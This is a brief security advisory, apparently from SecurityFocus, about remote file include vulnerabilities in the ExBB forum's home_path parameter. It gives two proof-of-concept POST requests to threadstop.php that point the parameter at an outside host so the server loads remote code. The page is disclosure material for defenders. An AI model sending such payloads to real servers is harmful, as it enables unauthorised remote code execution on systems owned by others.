ExBB Home_Path Parameter Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following POST examples are available:

POST www.example.com/Ex/modules/threadstop/threadstop.php? new_exbb[home_path]=http://www.example2.com?
POST www.example.com/Ex/modules/threadstop/threadstop.php? exbb[home_path]=http://www.example2.com/page?

The following proof-of-concept URIs are available:


 

Privacy Statement
Copyright 2010, SecurityFocus